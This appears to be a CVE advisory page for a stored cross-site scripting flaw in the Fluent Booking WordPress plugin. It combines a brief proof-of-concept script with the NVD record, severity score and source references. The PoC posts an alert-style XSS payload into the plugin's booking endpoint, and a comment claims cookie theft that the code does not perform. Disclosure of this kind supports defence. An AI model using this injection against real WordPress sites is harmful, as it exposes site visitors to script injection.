CVE-2026-2231

<!-- PoC for CVE-2026-2231: Stored XSS in Fluent Booking Target: Vulnerable parameters in booking submission --> <script> // Simulating a malicious payload injection // Attackers might inject this via the vulnerable booking fields // Example Payload to steal cookies var payload = '<img src=x onerror=alert(1)>'; // Hypothetical POST request to the vulnerable endpoint fetch('/wp-json/fluent-booking/v1/submit', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ 'location': payload, // Injecting into location parameter based on LocationService.php reference 'booking_meta': payload }) }).then(response => console.log('Payload injected')); </script>

{"cve": {"id": "CVE-2026-2231", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:09.670", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Fluent Booking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in all versions up to, and including, 2.0.01 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin Fluent Booking para WordPress es vulnerable a cross-site scripting almacenado a través de múltiples parámetros en todas las versiones hasta la 2.0.01, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto posibilita que atacantes no autenticados inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/fluent-booking/trunk/app/Hooks/Handlers/FrontEndHandler.php#L864", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/fluent-booking/trunk/app/Models/Booking.php#L440", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/fluent-booking/trunk/app/Models/Booking.php#L448", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/fluent-booking/trunk/app/Services/LocationService.php#L110", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/fluent-booking/trunk/app/Services/LocationService.php#L115", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3463540/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/37441cc0-c43c-40e4-a170-1be59e112272?source=cve", "source": "[email protected]"}]}}